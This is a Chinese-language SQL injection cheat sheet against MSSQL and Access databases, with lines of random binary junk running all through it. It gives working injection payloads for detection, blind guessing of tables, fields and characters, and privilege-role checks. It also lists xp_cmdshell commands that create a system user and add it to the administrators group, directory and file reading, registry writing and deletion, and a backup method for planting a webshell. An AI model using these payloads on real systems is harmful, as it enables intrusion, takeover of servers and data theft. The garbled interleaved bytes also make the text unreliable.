1.判断是否有注入;and 1=1 ;and 1=2 9e`}�;DE �
2.初步判断是否是mssql ;and user>0 xBxiB�hqzF
�3y.+0�3
W
3.注入参数是字符'and [查询条件] and ''=' @�xdtl{5G�
=Ya^PAj '}
4.搜索时没过滤参数的'and [查询条件] and '%25'=' w&H>`�l06
^Ak?2,xB#+
5.判断数据库系统 @��Dsw.@/
`�/�T.u&QF
;and (select count(*) from sysobjects)>0 mssql �7fypUQ�:y
IrYj#,�xJ�
;and (select count(*) from msysobjects)>0 access ��eg�*a�Vb
)8^E{w^D}�
]�Y�]]�X[@
(�e��nr�{1
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �).jQ+XE'>
%��TI3E�b�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 vGsAM*�vw6
�vh.8m��$,
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 r�
jn�:��E
Caj H;K�\�
9.(1)猜字段的ascii值(access) ��!4c�Cq�_
k
���76<CX
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 CP9�Q|'oJ�
u^�S�Inanw
(2)猜字段的ascii值(mssql) y$f�MMAN7
W�3/]
2"�0
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 ^"<Bk��<b(
DC).p�'0VL
10.测试权限结构(mssql) 2<U�C^v��Z
��6k@F?qHS
]/h��$6mrL
�'['%��b�
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- FU��Se�!�f
nL^7t�7mp�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- $'�CS/U`E}
r
�ts2Jk7f
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 4j0;okQWV'
�8�c�Z[Kl%
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- g
\S6>�LG!
��F\&wFA'J
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- ��X�P�rnQJ
,�� SUx!o�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- F}mt
*UcMG
b'��^�<�0c
;and 1=(select IS_MEMBER('db_owner'));-- E�2}X[EoBF
K�J/Gv#K�j
3-�{WF�nA
�b&E"r*i|�
11.添加mssql和系统的帐户 9?sY!��gXc
dCn�9]�cj/
;exec master.dbo.sp_addlogin username;-- sE]��z.Po=
;exec master.dbo.sp_password null,username,password;-- N68]r�3/�K
V1Ft�3�Msq
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- ���5�hEA/G
,^
,�R .T
;exec master.dbo.xp_cmdshell 'net user username password x2fqfrr�_]
"�PT�Et{qn
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- �f8K�0/��z
&b�:y#gvJ:
;exec master.dbo.xp_cmdshell 'net user username password /add';-- z{BgAI�,��
GNHXt�u6
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- uUp>N^mmVH
Edc3YSg%;
��7?g(��{]
P�fY�eV/M|
12.(1)遍历目录 ]4�c*Nh%8
DJd�hOL��x
;create table dirs(paths varchar(100), id int) Q�& �d;UVp
1k"t�[��^
;insert dirs exec master.dbo.xp_dirtree 'c:\' ;x�h.95BP`
)]�w&�DNc
;and (select top 1 paths from dirs)>0 �a%�m�>v�,
;L�76�V$&�
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) A+Un(tU2�(
rv�hMu}.��
����Z�X-A}
x/]G"�?Uix
(2)遍历目录 6E�^m�*la%
c'?�EI EP�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- "�<egm�^Yq
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 J�I-�.�SR�
AWFq5YMSI�
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 zO9WqP_`iR
c<q33d�Z!*
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 ��|R91|�-H
v��fT
@;`�
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 iX2�exJto
KX\=w�FbP)
E���rA*�a3
m�_ ��wv�i
13.mssql中的存储过程 O��P(om$xm
OJy�dt�;�a
xp_regenumvalues 注册表根键, 子键 �o6x8j�z�
�&�!�:mL],
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 u9q�#L.I�j
U7�z�d7��O
xp_regread 根键,子键,键值名 (@���BB�@G
4A�f7x6a;
;exec xp_regread �D��cRo�W
}`�0=\cKqn
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 6L�~5�qbQ�
��S��{XO3
xp_regwrite 根键,子键, 值名, 值类型, 值 \qW^AD(it<
T|$tQ�g�Y^
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 l9%ckC�*�q
b
H5�lLcdf
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 3# 0Nd"/0
P�_Gu~B�!Y
xp_regdeletevalue 根键,子键,值名 /&=y_%V��R
IWddJb~hu�
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 %Y.@AiViz
{�6�)H.vpP
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 6ypHH
2��X
t��G"EbW�i
uu�0��t}3l
N�eEV=+<-G
14.mssql的backup创建webshell j~i��n%|�^
[�p0_�I7��
use model �W`#E[g?]�
%,8
"c�M`D
create table cmd(str image); HD$��r�<bl
m=iKu(2xRq
insert into cmd(str) values (''); W�+V &����
-:!T@�rV,d
backup database model to disk='c:\l.asp'; ��1�D"EF��
�Sn�g3�B��
/sB,)>��X
04���X/(74
15.mssql内置函数 Wb^g{F!�W�
5@bm�m��]
;and (select @@version)>0 获得Windows的版本号 �;�;^?v��S
-q�-BP}r�3
;and user_name()='dbo' 判断当前系统的连接用户是不是sa C?g�*��c��
Ln�h'y��`q
;and (select user_name())>0 爆当前系统的连接用户 SrW�mV@"y�
Lm�R��OG-9
;and (select db_name())>0 得到当前连接的数据库 C91��'�dM�
R6o0�7.]��
{o�o�(HD;5
i�q����d7�
16.简洁的webshell IQ~EL'�;<w
Hb$w��awy<
use model ��,/p�.!�+
)q{e�� L�$
create table cmd(str image); i94)�D�WZ^
6l|�SGt\
insert into cmd(str) values (''); �Q�^l��gtb
cR6��#$-�a
backup database model to disk='g:\wwwtest\l.asp';
